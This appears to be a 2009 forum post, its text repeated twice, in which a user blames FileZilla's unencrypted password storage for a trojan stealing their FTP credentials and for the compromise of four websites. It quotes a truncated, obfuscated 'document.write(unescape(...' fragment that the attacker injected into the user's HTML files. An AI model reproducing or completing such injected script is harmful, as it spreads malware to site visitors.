Password file has been hacked and used by a virus
Posted: 2009-04-09 19:40
Hi all,
It took me some time to investigate, but I don't see another way, but I'm sure of the following about filezilla, my filezilla password file has been hacked by a trojan and given to a third party pirate...
All my web site I'm taking care of have been hacked and the ONLY place where the hacker could find the password was coming from Filezilla where all the password where stored in this place and only in this place.
I'm using filezilla client 3.2.3.1 and the hacker inserted the following script on each on my html files :
....
document.write(unescape('pZ%3CscPr
.....
of my four web sites !!
So I think the policy of having the filezilla passwords into a uncrypted password is foolish !
After 15 years of computing, (and I'm a Win32 programmer), this is the first time I got hacked....
is there a way to overcome filezilla password from being hacked so easly ?
Thanks
It took me some time to investigate, but I don't see another way, but I'm sure of the following about filezilla, my filezilla password file has been hacked by a trojan and given to a third party pirate...
All my web site I'm taking care of have been hacked and the ONLY place where the hacker could find the password was coming from Filezilla where all the password where stored in this place and only in this place.
I'm using filezilla client 3.2.3.1 and the hacker inserted the following script on each on my html files :
....
document.write(unescape('pZ%3CscPr
.....
of my four web sites !!
So I think the policy of having the filezilla passwords into a uncrypted password is foolish !
After 15 years of computing, (and I'm a Win32 programmer), this is the first time I got hacked....
is there a way to overcome filezilla password from being hacked so easly ?
Thanks